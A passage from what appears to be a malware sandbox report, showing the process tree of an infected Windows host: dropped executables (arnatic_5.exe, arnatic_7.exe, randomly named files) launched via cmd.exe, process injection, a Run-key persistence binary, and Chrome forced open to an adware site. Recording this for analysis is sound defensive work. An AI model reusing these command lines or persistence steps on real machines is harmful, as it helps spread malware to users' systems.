                                                                            timeout /t 6
                                                                            8⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:6688
                                                                      • C:\Users\Admin\Documents\IwUI6f5insw6iksVcsRukz5g.exe
                                                                        "C:\Users\Admin\Documents\IwUI6f5insw6iksVcsRukz5g.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4716
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                                                          7⤵
                                                                          • Loads dropped DLL
                                                                          • Enumerates system info in registry
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4224
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xb8,0xdc,0x7ffc6cb04f50,0x7ffc6cb04f60,0x7ffc6cb04f70
                                                                            8⤵
                                                                              PID:4132
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1816 /prefetch:2
                                                                              8⤵
                                                                                PID:4240
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1864 /prefetch:8
                                                                                8⤵
                                                                                  PID:4108
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1876 /prefetch:8
                                                                                  8⤵
                                                                                    PID:2856
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:1
                                                                                    8⤵
                                                                                      PID:3792
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
                                                                                      8⤵
                                                                                        PID:4112
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
                                                                                        8⤵
                                                                                          PID:5168
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
                                                                                          8⤵
                                                                                            PID:5160
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
                                                                                            8⤵
                                                                                              PID:5152
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                                                                              8⤵
                                                                                                PID:5144
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:5656
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:6928
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3512 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:1116
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:5628
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3828 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:7000
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3412 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:6876
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3436 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:5480
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=668 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:6572
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:6508
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:6484
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:4840
                                                                                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                      8⤵
                                                                                                                        PID:5236
                                                                                                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff71b57a890,0x7ff71b57a8a0,0x7ff71b57a8b0
                                                                                                                          9⤵
                                                                                                                            PID:5396
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1632 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:5184
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3960 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:5324
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:7144
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3412 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:7056
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:6988
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:4732
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:1360
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:7036
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
                                                                                                                                          8⤵
                                                                                                                                            PID:7092
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:7096
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
                                                                                                                                              8⤵
                                                                                                                                                PID:4568
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3560 /prefetch:8
                                                                                                                                                8⤵
                                                                                                                                                  PID:2164
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:4596
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:2252
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6520
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5276
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5284
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7856 /prefetch:8
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5528
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7600 /prefetch:8
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6784
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7592 /prefetch:8
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:6656
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7460 /prefetch:8
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:6628
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7320 /prefetch:8
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:4604
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7192 /prefetch:8
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:5788
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:8
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:6468
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:6340
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6692 /prefetch:8
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:6960
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:4672
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6164 /prefetch:8
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5800
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:2204
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:8
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:2816
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:656
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:7004
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:1
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5536
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8518619306084114892,18321876180504313945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6764 /prefetch:8
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:7152
                                                                                                                                                                                        • C:\Users\Admin\Documents\OganySaDTfiOtO6mutqoVrby.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\OganySaDTfiOtO6mutqoVrby.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:5016
                                                                                                                                                                                          • C:\Users\Admin\Documents\OganySaDTfiOtO6mutqoVrby.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\OganySaDTfiOtO6mutqoVrby.exe" -a
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:6132
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:1792
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:3888
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:1128
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:1244
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:3880
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_7.exe
                                                                                                                                                                                arnatic_7.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:4032
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_7.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_7.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:2308
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_7.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_7.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4036
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_5.exe
                                                                                                                                                                                arnatic_5.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:2720
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1835570.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1835570.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:3960
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8387455.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8387455.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:2316
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                    3⤵
